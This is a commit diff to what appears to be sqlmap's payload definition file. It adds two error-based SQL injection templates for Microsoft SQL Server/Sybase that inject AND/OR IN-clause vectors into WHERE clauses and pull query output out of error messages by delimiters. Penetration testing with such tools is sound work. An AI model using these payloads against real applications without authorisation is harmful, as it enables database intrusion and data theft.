new error vector for MS SQL (from David Guimaraes' mail)

xml/payloads.xml

@@ -792,6 +792,25 @@ Formats:
         </details>
     </test>
 
+    <test>
+        <title>Microsoft SQL Server/Sybase AND error-based - WHERE clause (IN)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Oracle AND error-based - WHERE clause (XMLType)</title>
         <stype>2</stype>
@@ -947,6 +966,25 @@ Formats:
         </details>
     </test>
 
+    <test>
+        <title>Microsoft SQL Server/Sybase OR error-based - WHERE clause (IN)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Oracle OR error-based - WHERE clause (XMLType)</title>
         <stype>2</stype>